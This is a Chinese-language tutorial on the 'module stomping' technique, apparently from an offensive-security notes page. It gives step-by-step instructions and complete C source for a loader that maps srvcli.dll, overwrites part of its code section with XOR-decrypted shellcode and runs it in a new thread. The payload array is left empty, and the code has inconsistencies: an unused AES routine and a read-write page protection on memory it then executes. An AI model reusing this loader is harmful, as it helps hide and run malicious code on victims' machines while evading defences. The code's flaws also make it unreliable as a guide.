模块踩踏

简介

模块践踏通常涉及到选择一个已经加载到内存中的模块,然后覆盖或替换这个模块的部分内容,通常是其.text段(代码段),以实现恶意代码的注入

实现思路

  1. 在内存中加载srvcli.dll模块,并找到这个模块在内存中的地址。

  2. 定义了一个包含加密后shellcode的数组(encryptedShellcode)和一个密钥(key)。此shellcode是以异或加密的形式给出的。

  3. 创建一个新的数组(shellcode),用于存储解密后的shellcode。使用给定的密钥对加密的shellcode进行解密。

  4. 调用NtProtectVirtualMemory函数改变选定内存区域的保护属性,将其改为可读写。

  5. 使用RtlMoveMemory函数将解密后的shellcode复制到目标模块(srvcli.dll)在内存中的地址。

  6. 使用NtProtectVirtualMemory函数恢复原来的内存保护属性。

  7. 创建一个新线程来执行注入的shellcode。新线程的入口点设置为shellcode的内存地址。

  8. 调用NtWaitForSingleObject等待新创建的线程执行完毕。

完整代码

#include <Windows.h>
#include <stdio.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")
#pragma comment(lib, "ntdll")
#define NtCurrentProcess() ((HANDLE)-1)
#define DEFAULT_BUFLEN 4096
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

WCHAR* slib = (WCHAR*)L"C:\\Windows\\system32\\srvcli.dll";
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
	HANDLE ProcessHandle,
	PVOID* BaseAddress,
	ULONG_PTR ZeroBits,
	PSIZE_T RegionSize,
	ULONG AllocationType,
	ULONG Protect
);
EXTERN_C NTSTATUS NtProtectVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN OUT PSIZE_T RegionSize,
	IN ULONG NewProtect,
	OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx(
	OUT PHANDLE hThread,
	IN ACCESS_MASK DesiredAccess,
	IN PVOID ObjectAttributes,
	IN HANDLE ProcessHandle,
	IN PVOID lpStartAddress,
	IN PVOID lpParameter,
	IN ULONG Flags,
	IN SIZE_T StackZeroBits,
	IN SIZE_T SizeOfStackCommit,
	IN SIZE_T SizeOfStackReserve,
	OUT PVOID lpBytesBuffer
);
EXTERN_C NTSTATUS NtWaitForSingleObject(
	IN HANDLE Handle,
	IN BOOLEAN Alertable,
	IN PLARGE_INTEGER Timeout
);

void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
	HCRYPTPROV hProv;
	HCRYPTHASH hHash;
	HCRYPTKEY hKey;
	if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES,
		CRYPT_VERIFYCONTEXT)) {
		printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());
		return;
	}
	if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
		printf("Failed in CryptCreateHash (%u)\n", GetLastError());
		return;
	}
	if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
		printf("Failed in CryptHashData (%u)\n", GetLastError());
		return;
	}
	if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
		printf("Failed in CryptDeriveKey (%u)\n", GetLastError());
		return;
	}
	if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode,
		&shellcodeLen)) {
		printf("Failed in CryptDecrypt (%u)\n", GetLastError());
		return;
	}
	CryptReleaseContext(hProv, 0);
	CryptDestroyHash(hHash);
	CryptDestroyKey(hKey);
}


int main(int argc, char** argv) {
	
	// 填写xor加密后的shellcode
	char encryptedShellcode[] = "";
	
	// 定义解密所用的密钥
	char key[] = "12henry1222345??6aa+-==@asd";

	DWORD payload_length = sizeof(encryptedShellcode);
	PVOID BaseAddress = NULL;
	SIZE_T dwSize = 0x2000;
	HMODULE addr;
	addr = LoadLibrary(slib);
	BaseAddress = addr + 0x1000 * 2 + 0xf; //2kb+f
	printf(" ptr:%p", BaseAddress);

	
	// 定义一个与加密shellcode大小相同的数组用于存储解密后的shellcode
	unsigned char shellcode[sizeof encryptedShellcode];
	// 获取密钥的长度
	int keylength = strlen(key);
	// 遍历加密的shellcode,并使用异或操作进行解密,将结果存储在shellcode数组中
	for (int i = 0; i < sizeof encryptedShellcode; i++) {
		shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
		printf("%02X", shellcode[i]);
	}
	DWORD OldProtect = 0;
	NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize,
		PAGE_READWRITE, &OldProtect);


	RtlMoveMemory(BaseAddress, shellcode, sizeof(shellcode));
	HANDLE hThread;
	NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize,
		OldProtect, &OldProtect);
	HANDLE hHostThread = INVALID_HANDLE_VALUE;
	NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF,
		NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE,
		NULL, NULL, NULL, NULL); 
	getchar();
	if (!NT_SUCCESS(NtCreateThreadstatus)) {
		printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
		return 3;
	}
	LARGE_INTEGER Timeout;
	Timeout.QuadPart = -10000000;
	NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, NULL);
	if (!NT_SUCCESS(NTWFSOstatus)) {
		printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
		return 4;
	}
	return 0;
}

最后更新于